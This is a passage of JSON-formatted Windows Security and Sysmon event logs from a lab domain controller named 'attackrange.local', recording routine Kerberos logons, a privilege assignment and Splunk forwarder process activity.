Operations","Opcode":"Info","TargetUserName":"WIN-DC-8400769$@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-8400769$","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{D2B11785-80FE-DC50-4342-8A46119CA671}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 06:58:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220676,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":988,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x9707B\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x9707b","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 06:58:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220677,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":988,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tDelegation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x9707B\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{D755DE17-83D3-1A2D-D482-DC8AECCD4EEA}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\tfe80::bd2f:79cc:df6c:109f\r\n\tSource Port:\t\t52717\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-8400769$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x9707b","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{D755DE17-83D3-1A2D-D482-DC8AECCD4EEA}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"fe80::bd2f:79cc:df6c:109f","IpPort":"52717","ImpersonationLevel":"%%1840","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:58:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":6698,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:57.975\r\nProcessGuid: {E2A3D6B1-12B1-5F25-0000-0010BD700900}\r\nProcessId: 4912\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Network monitor\r\nProduct: Splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-netmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:58:57.975","ProcessGuid":"{E2A3D6B1-12B1-5F25-0000-0010BD700900}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","FileVersion":"8.0.2","Description":"Network monitor","Product":"Splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-netmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:58:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6699,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:57.975\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 1376\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-12B1-5F25-0000-0010BD700900}\r\nTargetProcessId: 4912\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:57.975","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"1376","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-12B1-5F25-0000-0010BD700900}","TargetProcessId":"4912","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:58:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6700,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:57.975\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-12B1-5F25-0000-0010BD700900}\r\nTargetProcessId: 4912\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:57.975","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-12B1-5F25-0000-0010BD700900}","TargetProcessId":"4912","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:58:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6701,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:57.975\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:57.975","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:58:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6702,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:57.975\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:57.975","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:58:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6703,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:57.975\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:57.975","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:58:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6704,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:57.975\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 